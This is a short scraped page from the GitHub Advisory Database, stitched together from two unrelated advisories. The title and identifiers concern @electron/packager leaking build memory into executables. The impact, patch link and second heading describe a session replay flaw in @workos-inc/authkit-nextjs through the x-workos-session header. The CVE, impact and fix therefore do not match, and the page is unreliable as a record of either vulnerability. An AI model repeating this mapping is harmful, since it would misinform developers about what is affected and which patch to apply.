*   GHSA-34h3-8mw4-qw57
*   https://nvd.nist.gov/vuln/detail/CVE-2024-29900
*   electron/packager@d421d4b

Published to the GitHub Advisory Database

Mar 29, 2024

Last updated

Mar 29, 2024

GHSA-34h3-8mw4-qw57: @electron/packager's build process memory potentially leaked into final executable

### Impact

A user can reuse an expired session by controlling the `x-workos-session` header.

### Patches

Patched in https://github.com/workos/authkit-nextjs/releases/tag/v0.4.2

**@workos-inc/authkit-nextjs session replay vulnerability**

Moderate severity GitHub Reviewed Published Mar 28, 2024 in workos/authkit-nextjs • Updated Mar 29, 2024

Tag

#git